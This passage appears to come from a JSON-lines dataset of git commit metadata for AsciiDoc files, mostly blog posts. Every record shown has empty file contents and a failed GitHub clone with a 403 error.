gping\/elasticsearch,sdauletau\/elasticsearch,diendt\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rhoml\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,markwalkom\/elasticsearch,avikurapati\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,xingguang2013\/elasticsearch,strapdata\/elassandra5-rc,robin13\/elasticsearch,drewr\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,shreejay\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,episerver\/elasticsearch,umeshdangat\/elasticsearch,lmtwga\/elasticsearch,F0lha\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,wbowling\/elasticsearch,elasticdog\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,areek\/elasticsearch,polyfractal\/elasticsearch,lzo\/elasticsearch-1,caengcjd\/elasticsearch,mikemccand\/elasticsearch,weipinghe\/elasticsearch,kunallimaye\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,rlugojr\/elasticsearch,sdauletau\/elasticsearch,dongjoon-hyun\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,jchampion\/elasticsearch,AndreKR\/elasticsearch,avikurapati\/elasticsearch,nilabhsagar\/elasticsearch,karthikjaps\/elasticsearch,xuzha\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,nrkkalyan\/elasticsearch,kalburgimanjunath\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,jeteve\/elasticsearch,andrestc\/elasticsearch,Collaborne\/elasticsearch,GlenRSmith\/elasticsearch,kaneshin\/elasticsearch,onegambler\/elasticsearch,jimczi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,Collaborne\/elasticsearch,karthikjaps\/elasticsearch,polyfractal\/elasticsearch,spiegela\/elasticsearch,caengcjd\/elasticsearch,kunallimaye\/elasticsearch,scottsom\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,lmtwga\/elasticsearch,mikemccand\/elasticsearch,PhaedrusTheGreek\/elasticsearch,njlawton\/elasticsearch,zkidkid\/elasticsearch,StefanGor\/elasticsearch,ricardocerq\/elasticsearch,wangtuo\/elasticsearch,jbertouch\/elasticsearch,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,lzo\/elasticsearch-1,elasticdog\/elasticsearch,schonfeld\/elasticsearch,rajanm\/elasticsearch,socialrank\/elasticsearch,masterweb121\/elasticsearch,nazarewk\/elasticsearch,ivansun1010\/elasticsearch,snikch\/elasticsearch,socialrank\/elasticsearch,JervyShi\/elasticsearch,davidvgalbraith\/elasticsearch,artnowo\/elasticsearch,mmaracic\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,clintongormley\/elasticsearch,dpursehouse\/elasticsearch,snikch\/elasticsearch,F0lha\/elasticsearch,fforbeck\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,nomoa\/elasticsearch,a2lin\/elasticsearch,YosuaMichael\/elasticsearch,tebriel\/elasticsearch,markharwood\/elasticsearch,YosuaMichael\/elasticsearch,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,dpursehouse\/elasticsearch,IanvsPoplicola\/elasticsearch,tebriel\/elasticsearch,schonfeld\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,caengcjd\/elasticsea
rch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,sreeramjayan\/elasticsearch,awislowski\/elasticsearch,HonzaKral\/elasticsearch,gmarz\/elasticsearch,markharwood\/elasticsearch,yanjunh\/elasticsearch,rmuir\/elasticsearch,myelin\/elasticsearch,alexshadow007\/elasticsearch,lzo\/elasticsearch-1,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,xuzha\/elasticsearch,tebriel\/elasticsearch,PhaedrusTheGreek\/elasticsearch,YosuaMichael\/elasticsearch,clintongormley\/elasticsearch,andrestc\/elasticsearch,geidies\/elasticsearch,hafkensite\/elasticsearch,MisterAndersen\/elasticsearch,LewayneNaidoo\/elasticsearch,jeteve\/elasticsearch,rhoml\/elasticsearch,spiegela\/elasticsearch,spiegela\/elasticsearch,awislowski\/elasticsearch,markwalkom\/elasticsearch,Collaborne\/elasticsearch,polyfractal\/elasticsearch,strapdata\/elassandra5-rc,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,HonzaKral\/elasticsearch,onegambler\/elasticsearch,bawse\/elasticsearch,diendt\/elasticsearch,jchampion\/elasticsearch,trangvh\/elasticsearch,jbertouch\/elasticsearch,kalburgimanjunath\/elasticsearch,myelin\/elasticsearch,JSCooke\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,GlenRSmith\/elasticsearch,drewr\/elasticsearch,hafkensite\/elasticsearch,sdauletau\/elasticsearch,wuranbo\/elasticsearch,palecur\/elasticsearch,martinstuga\/elasticsearch,kaneshin\/elasticsearch,yynil\/elasticsearch,jchampion\/elasticsearch,andrejserafim\/elasticsearch,schonfeld\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,cnfire\/elasticsearch-1,uschindler\/elasticsearch,wuranbo\/elasticsearch,petabytedata\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,weipinghe\/elasticsearch,scottsom\/elasticsearch,martinstuga\/elasticsearch,sdauletau\/elasticsearch,davidvgalbraith\/elasticsearch,scottsom\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_file":"docs\/reference\/migration\/migrate_query_refactoring.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b205591cbf95526c5cdd7a17fac0b08dbb7a70bd","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e4c8bae909800c7882c28ddbf5c2dbdbece07b","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"412cbc80e422905ae5a8ef9ba1d2888bc89f3e60","subject":"use the left aligned toc","message":"use the left aligned toc\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"resume.adoc","new_file":"resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd64bba8e4dd5ab75ea479f1bc8190d7a99ab0e3","subject":"Update 2016-03-29-.adoc","message":"Update 2016-03-29-.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-29-.adoc","new_file":"_posts\/2016-03-29-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25dafcf63c4a4efe68012974e0b2dc7016532735","subject":"add release instructions","message":"add release instructions\n","repos":"objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/release_process.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/release_process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04f848f0b05e159263b333185cfcd8150e091461","subject":"Update 2016-01-11-Init.adoc","message":"Update 2016-01-11-Init.adoc","repos":"rpawlaszek\/rpawlaszek.github.io,rpawlaszek\/rpawlaszek.github.io,rpawlaszek\/rpawlaszek.github.io","old_file":"_posts\/2016-01-11-Init.adoc","new_file":"_posts\/2016-01-11-Init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rpawlaszek\/rpawlaszek.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e06897092f6948e16ac93e72e337bce8da222dd","subject":"Update 2015-09-25-First-post.adoc","message":"Update 2015-09-25-First-post.adoc","repos":"spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress","old_file":"_posts\/2015-09-25-First-post.adoc","new_file":"_posts\/2015-09-25-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spe\/spe.github.io.hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4eabdbf3538e6bb73ee6e2ef32b9bc58de1d5a7","subject":"Update 2017-08-26-Setting-up-a-web-app-project-using-Google-Firebase-and-reactjs.adoc","message":"Update 2017-08-26-Setting-up-a-web-app-project-using-Google-Firebase-and-reactjs.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2017-08-26-Setting-up-a-web-app-project-using-Google-Firebase-and-reactjs.adoc","new_file":"_posts\/2017-08-26-Setting-up-a-web-app-project-using-Google-Firebase-and-reactjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"974f56f88706a3c8ee15e1a2cda2eeb51ec882b4","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3f41101519264f2812b9188f9b6f594c2fe4fc","subject":"Update 2017-05-29-Epoch-64-bit-self-hosting-progress.adoc","message":"Update 2017-05-29-Epoch-64-bit-self-hosting-progress.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-05-29-Epoch-64-bit-self-hosting-progress.adoc","new_file":"_posts\/2017-05-29-Epoch-64-bit-self-hosting-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75ec84aa0efc9ffb743987895ffb06bf540c3a3e","subject":"y2b create post Star Wars Headphones! SMS Audio Street by 50","message":"y2b create post Star Wars Headphones! 
SMS Audio Street by 50","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-07-Star-Wars-Headphones-SMS-Audio-Street-by-50.adoc","new_file":"_posts\/2014-05-07-Star-Wars-Headphones-SMS-Audio-Street-by-50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"623664baeff57530e20336fb5bb023c23700a914","subject":"Renamed '_posts\/2017-12-01-Christmas-Gift-Ideas.adoc' to '_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc'","message":"Renamed '_posts\/2017-12-01-Christmas-Gift-Ideas.adoc' to '_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc","new_file":"_posts\/2017-12-01-Christmas-Gift-Ideas-That-Make-a-Difference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9fd1484690cc605bbf354d3633235a04846634d","subject":"y2b create post FREE GAMES \\u0026 APPS - THIS WEEK ONLY","message":"y2b create post FREE GAMES \\u0026 APPS - THIS WEEK ONLY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-08-FREE-GAMES-u0026-APPS--THIS-WEEK-ONLY.adoc","new_file":"_posts\/2013-07-08-FREE-GAMES-u0026-APPS--THIS-WEEK-ONLY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1d0a3554bb5870786cbfda20e7d2ca093618eb7","subject":"Update 2017-04-18-Test.adoc","message":"Update 2017-04-18-Test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-04-18-Test.adoc","new_file":"_posts\/2017-04-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dff1db4a4caa86405884e8e8278d59e7adce623","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e649edf326574db45de390ca48affe7b825b650b","subject":"Adding release notes for release of revapi_jackson revapi_json revapi_yaml","message":"Adding release notes for release of revapi_jackson revapi_json 
revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210110-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210110-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"102f8fce445c97c8559152ed5db35019c1258bfa","subject":"y2b create post Samsung 55D6500 LED 3D TV (Smart TV)","message":"y2b create post Samsung 55D6500 LED 3D TV (Smart TV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-26-Samsung-55D6500-LED-3D-TV-Smart-TV.adoc","new_file":"_posts\/2011-09-26-Samsung-55D6500-LED-3D-TV-Smart-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f11d623f512608ec908fde5531b7d5454f13826","subject":"Update 2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","message":"Update 2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","new_file":"_posts\/2016-01-15-Using-Hadoop-to-create-image-tiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e2cbbf84056b4f735b28a506a9fc77a492bf06","subject":"Update 2016-11-13-Burp-Sentinel-improvements-outlook.adoc","message":"Update 2016-11-13-Burp-Sentinel-improvements-outlook.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2016-11-13-Burp-Sentinel-improvements-outlook.adoc","new_file":"_posts\/2016-11-13-Burp-Sentinel-improvements-outlook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8e0beb8962c5142bd770f1b2ccf121ab96b640","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8788f1f6c2ddd30283e8d025ab502d7b01465d1d","subject":"Publish 2015-01-31.adoc","message":"Publish 2015-01-31.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"2015-01-31.adoc","new_file":"2015-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da3e562425c3ab5ab82378ac8f114d0244e4a31","subject":"Update 2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","message":"Update 2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","new_file":"_posts\/2015-09-09-Android-Top-level-element-is-not-completed-in-AndroidManifestxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f53d3eb56c8a1f796a7a64016dfcbb85d8f96a2e","subject":"Add contributing document","message":"Add contributing document\n","repos":"molindo\/spring-social,codeconsole\/spring-social,molindo\/spring-social,spring-projects\/spring-social,Turbots\/spring-social,Turbots\/spring-social,codeconsole\/spring-social,spring-projects\/spring-social","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Turbots\/spring-social.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4a9b1ad7ca1ea9efdf06b4b8a7d23e1af5c8ca0","subject":"Update 2015-08-23-Walmart.adoc","message":"Update 2015-08-23-Walmart.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-23-Walmart.adoc","new_file":"_posts\/2015-08-23-Walmart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24d06f739e0e90e4b92d84193f2d561305d08dd2","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67dc37f91f55c8c7755e5d29a54fa884c4a2a4fc","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dd521d3e06233b1080ac64cf35e6397ac9f9585","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 
2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35cbfcda028fc0e7132f063b507707e600af9d06","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95977b1f188e701b69d81abb5e97f9faa7f5d0f7","subject":"Update 2015-10-23-A-2nd-example-post.adoc","message":"Update 2015-10-23-A-2nd-example-post.adoc","repos":"IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2","old_file":"_posts\/2015-10-23-A-2nd-example-post.adoc","new_file":"_posts\/2015-10-23-A-2nd-example-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdeaThoughtStream\/IdeaThoughtStream.github.io.old2.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e2402c9f045f092a8b7e9c2af69b295f53c58a","subject":"y2b create post What Magic Is This?","message":"y2b create post What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-07-What-Magic-Is-This.adoc","new_file":"_posts\/2017-01-07-What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26e0c907f5cc4d1be889f64577ce5468d8f7ea84","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c8bb741865f7b0055d96a6542f74819bae28dec","subject":"Update 2019-09-10-Model-Distillation.adoc","message":"Update 2019-09-10-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef159cadc91c9cfff990cc4024ec71908f612ec","subject":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","message":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc0bec056370ec560ed6cfddf86e25ee4a8d6a5","subject":"Update 2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","message":"Update 2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","new_file":"_posts\/2016-03-26-Microservices-in-the-Chronicle-World-Part-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 